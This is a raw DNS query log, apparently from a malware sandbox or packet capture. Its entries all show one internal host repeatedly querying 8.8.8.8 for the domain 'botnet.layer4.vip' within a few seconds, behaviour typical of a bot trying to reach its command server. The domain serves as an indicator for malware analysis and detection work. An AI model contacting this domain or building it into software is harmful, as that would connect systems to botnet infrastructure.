                                  Apr 9, 2023 03:30:42.678703070 CEST192.168.2.238.8.8.80x539fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.694288015 CEST192.168.2.238.8.8.80x539fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.719002008 CEST192.168.2.238.8.8.80xbb6aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.743638039 CEST192.168.2.238.8.8.80xbb6aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.767919064 CEST192.168.2.238.8.8.80xbb6aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.783447981 CEST192.168.2.238.8.8.80xbb6aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.807555914 CEST192.168.2.238.8.8.80xbb6aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.832212925 CEST192.168.2.238.8.8.80xa36fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.856770039 CEST192.168.2.238.8.8.80xa36fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.881488085 CEST192.168.2.238.8.8.80xa36fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.897417068 CEST192.168.2.238.8.8.80xa36fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.921752930 CEST192.168.2.238.8.8.80xa36fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.945744038 CEST192.168.2.238.8.8.80x3978Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.970062017 CEST192.168.2.238.8.8.80x3978Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.994097948 CEST192.168.2.238.8.8.80x3978Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.018089056 CEST192.168.2.238.8.8.80x3978Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.042272091 CEST192.168.2.238.8.8.80x3978Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.066757917 CEST192.168.2.238.8.8.80x1d38Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.090970993 CEST192.168.2.238.8.8.80x1d38Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.106426954 CEST192.168.2.238.8.8.80x1d38Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.122097969 CEST192.168.2.238.8.8.80x1d38Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.146147966 CEST192.168.2.238.8.8.80x1d38Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.161725044 CEST192.168.2.238.8.8.80x2bb3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.185868025 CEST192.168.2.238.8.8.80x2bb3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.201443911 CEST192.168.2.238.8.8.80x2bb3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.225739956 CEST192.168.2.238.8.8.80x2bb3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.249820948 CEST192.168.2.238.8.8.80x2bb3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.274023056 CEST192.168.2.238.8.8.80x8602Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.298190117 CEST192.168.2.238.8.8.80x8602Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.322315931 CEST192.168.2.238.8.8.80x8602Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.346853018 CEST192.168.2.238.8.8.80x8602Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.362390041 CEST192.168.2.238.8.8.80x8602Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.386984110 CEST192.168.2.238.8.8.80x7adeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.411082029 CEST192.168.2.238.8.8.80x7adeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.426986933 CEST192.168.2.238.8.8.80x7adeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.442533016 CEST192.168.2.238.8.8.80x7adeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.458548069 CEST192.168.2.238.8.8.80x7adeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.474257946 CEST192.168.2.238.8.8.80xa80cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.489789009 CEST192.168.2.238.8.8.80xa80cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.514163017 CEST192.168.2.238.8.8.80xa80cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.538294077 CEST192.168.2.238.8.8.80xa80cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.554114103 CEST192.168.2.238.8.8.80xa80cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.570116997 CEST192.168.2.238.8.8.80x303Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.594284058 CEST192.168.2.238.8.8.80x303Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.618519068 CEST192.168.2.238.8.8.80x303Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.634344101 CEST192.168.2.238.8.8.80x303Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.658813953 CEST192.168.2.238.8.8.80x303Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.674807072 CEST192.168.2.238.8.8.80xdf65Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.711247921 CEST192.168.2.238.8.8.80xdf65Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.727277040 CEST192.168.2.238.8.8.80xdf65Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.751607895 CEST192.168.2.238.8.8.80xdf65Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.776007891 CEST192.168.2.238.8.8.80xdf65Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.800529957 CEST192.168.2.238.8.8.80xc6d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.816430092 CEST192.168.2.238.8.8.80xc6d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.840748072 CEST192.168.2.238.8.8.80xc6d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.864846945 CEST192.168.2.238.8.8.80xc6d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.888895988 CEST192.168.2.238.8.8.80xc6d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.904550076 CEST192.168.2.238.8.8.80x385Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.928914070 CEST192.168.2.238.8.8.80x385Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.952970028 CEST192.168.2.238.8.8.80x385Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.977380037 CEST192.168.2.238.8.8.80x385Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.993206024 CEST192.168.2.238.8.8.80x385Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.008826971 CEST192.168.2.238.8.8.80xbed5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.024683952 CEST192.168.2.238.8.8.80xbed5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.048841000 CEST192.168.2.238.8.8.80xbed5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.073091984 CEST192.168.2.238.8.8.80xbed5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.088740110 CEST192.168.2.238.8.8.80xbed5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.104640961 CEST192.168.2.238.8.8.80x82d4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.120151997 CEST192.168.2.238.8.8.80x82d4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.135652065 CEST192.168.2.238.8.8.80x82d4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.151063919 CEST192.168.2.238.8.8.80x82d4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.166790009 CEST192.168.2.238.8.8.80x82d4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.182678938 CEST192.168.2.238.8.8.80x686dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.198168039 CEST192.168.2.238.8.8.80x686dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.222232103 CEST192.168.2.238.8.8.80x686dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.246359110 CEST192.168.2.238.8.8.80x686dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.270652056 CEST192.168.2.238.8.8.80x686dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.295106888 CEST192.168.2.238.8.8.80xaebaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.319655895 CEST192.168.2.238.8.8.80xaebaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.335274935 CEST192.168.2.238.8.8.80xaebaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.359750032 CEST192.168.2.238.8.8.80xaebaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.383925915 CEST192.168.2.238.8.8.80xaebaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.399600983 CEST192.168.2.238.8.8.80xfa65Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.423985004 CEST192.168.2.238.8.8.80xfa65Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.448338032 CEST192.168.2.238.8.8.80xfa65Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.472817898 CEST192.168.2.238.8.8.80xfa65Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.488444090 CEST192.168.2.238.8.8.80xfa65Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.512670994 CEST192.168.2.238.8.8.80x58ebStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.528589964 CEST192.168.2.238.8.8.80x58ebStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.544506073 CEST192.168.2.238.8.8.80x58ebStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.560554028 CEST192.168.2.238.8.8.80x58ebStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.584729910 CEST192.168.2.238.8.8.80x58ebStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.601191044 CEST192.168.2.238.8.8.80x6804Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.625292063 CEST192.168.2.238.8.8.80x6804Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.649379015 CEST192.168.2.238.8.8.80x6804Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.673537016 CEST192.168.2.238.8.8.80x6804Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.689590931 CEST192.168.2.238.8.8.80x6804Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.714344025 CEST192.168.2.238.8.8.80xa6b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.730246067 CEST192.168.2.238.8.8.80xa6b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.746089935 CEST192.168.2.238.8.8.80xa6b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.770446062 CEST192.168.2.238.8.8.80xa6b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.786389112 CEST192.168.2.238.8.8.80xa6b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.802316904 CEST192.168.2.238.8.8.80xc426Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.818208933 CEST192.168.2.238.8.8.80xc426Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.842660904 CEST192.168.2.238.8.8.80xc426Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.858534098 CEST192.168.2.238.8.8.80xc426Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.874094009 CEST192.168.2.238.8.8.80xc426Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.898538113 CEST192.168.2.238.8.8.80xcee1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.922894955 CEST192.168.2.238.8.8.80xcee1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.946875095 CEST192.168.2.238.8.8.80xcee1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.970801115 CEST192.168.2.238.8.8.80xcee1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.986603975 CEST192.168.2.238.8.8.80xcee1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.010673046 CEST192.168.2.238.8.8.80xc59bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.035085917 CEST192.168.2.238.8.8.80xc59bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.059530973 CEST192.168.2.238.8.8.80xc59bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.075174093 CEST192.168.2.238.8.8.80xc59bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.090725899 CEST192.168.2.238.8.8.80xc59bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.115245104 CEST192.168.2.238.8.8.80x932fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.139607906 CEST192.168.2.238.8.8.80x932fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.155045986 CEST192.168.2.238.8.8.80x932fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.179161072 CEST192.168.2.238.8.8.80x932fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.195101976 CEST192.168.2.238.8.8.80x932fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.221376896 CEST192.168.2.238.8.8.80x67c5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.236893892 CEST192.168.2.238.8.8.80x67c5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.260901928 CEST192.168.2.238.8.8.80x67c5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.276619911 CEST192.168.2.238.8.8.80x67c5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.292124033 CEST192.168.2.238.8.8.80x67c5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.317133904 CEST192.168.2.238.8.8.80x7d3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.341238976 CEST192.168.2.238.8.8.80x7d3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.365636110 CEST192.168.2.238.8.8.80x7d3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.381177902 CEST192.168.2.238.8.8.80x7d3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.396678925 CEST192.168.2.238.8.8.80x7d3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.420892954 CEST192.168.2.238.8.8.80xbf01Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.436800957 CEST192.168.2.238.8.8.80xbf01Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.461231947 CEST192.168.2.238.8.8.80xbf01Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.476685047 CEST192.168.2.238.8.8.80xbf01Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.492193937 CEST192.168.2.238.8.8.80xbf01Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.508048058 CEST192.168.2.238.8.8.80xbf21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.532417059 CEST192.168.2.238.8.8.80xbf21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.556705952 CEST192.168.2.238.8.8.80xbf21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.572206020 CEST192.168.2.238.8.8.80xbf21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.588340044 CEST192.168.2.238.8.8.80xbf21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.612467051 CEST192.168.2.238.8.8.80x8175Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.636982918 CEST192.168.2.238.8.8.80x8175Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.652568102 CEST192.168.2.238.8.8.80x8175Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.677495956 CEST192.168.2.238.8.8.80x8175Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.709613085 CEST192.168.2.238.8.8.80x8175Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.736892939 CEST192.168.2.238.8.8.80x8c61Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.761871099 CEST192.168.2.238.8.8.80x8c61Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.780848980 CEST192.168.2.238.8.8.80x8c61Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.809505939 CEST192.168.2.238.8.8.80x8c61Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.834609985 CEST192.168.2.238.8.8.80x8c61Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.861119986 CEST192.168.2.238.8.8.80xe26bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.877831936 CEST192.168.2.238.8.8.80xe26bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.902029991 CEST192.168.2.238.8.8.80xe26bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.926168919 CEST192.168.2.238.8.8.80xe26bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.942101002 CEST192.168.2.238.8.8.80xe26bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.957648993 CEST192.168.2.238.8.8.80x53Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.973320961 CEST192.168.2.238.8.8.80x53Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:45.997354984 CEST192.168.2.238.8.8.80x53Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.022289038 CEST192.168.2.238.8.8.80x53Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.038235903 CEST192.168.2.238.8.8.80x53Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.054197073 CEST192.168.2.238.8.8.80xb462Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.070120096 CEST192.168.2.238.8.8.80xb462Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.086049080 CEST192.168.2.238.8.8.80xb462Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.102349043 CEST192.168.2.238.8.8.80xb462Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.117983103 CEST192.168.2.238.8.8.80xb462Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.142663956 CEST192.168.2.238.8.8.80xae34Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.166888952 CEST192.168.2.238.8.8.80xae34Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.191150904 CEST192.168.2.238.8.8.80xae34Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.207952976 CEST192.168.2.238.8.8.80xae34Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.232352018 CEST192.168.2.238.8.8.80xae34Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.248533010 CEST192.168.2.238.8.8.80x34cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.264481068 CEST192.168.2.238.8.8.80x34cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.290040016 CEST192.168.2.238.8.8.80x34cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.314187050 CEST192.168.2.238.8.8.80x34cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.338306904 CEST192.168.2.238.8.8.80x34cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.354300976 CEST192.168.2.238.8.8.80x69aeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.378398895 CEST192.168.2.238.8.8.80x69aeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.393877983 CEST192.168.2.238.8.8.80x69aeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.409764051 CEST192.168.2.238.8.8.80x69aeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.425174952 CEST192.168.2.238.8.8.80x69aeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.449683905 CEST192.168.2.238.8.8.80x5f93Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.474109888 CEST192.168.2.238.8.8.80x5f93Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.498111963 CEST192.168.2.238.8.8.80x5f93Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.522731066 CEST192.168.2.238.8.8.80x5f93Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.538450003 CEST192.168.2.238.8.8.80x5f93Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.562848091 CEST192.168.2.238.8.8.80x6258Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.578635931 CEST192.168.2.238.8.8.80x6258Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.602725983 CEST192.168.2.238.8.8.80x6258Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.618658066 CEST192.168.2.238.8.8.80x6258Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.642803907 CEST192.168.2.238.8.8.80x6258Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.658731937 CEST192.168.2.238.8.8.80x90cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.683269024 CEST192.168.2.238.8.8.80x90cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.707792997 CEST192.168.2.238.8.8.80x90cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.723849058 CEST192.168.2.238.8.8.80x90cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.748346090 CEST192.168.2.238.8.8.80x90cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:46.764065981 CEST192.168.2.238.8.8.80xc048Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
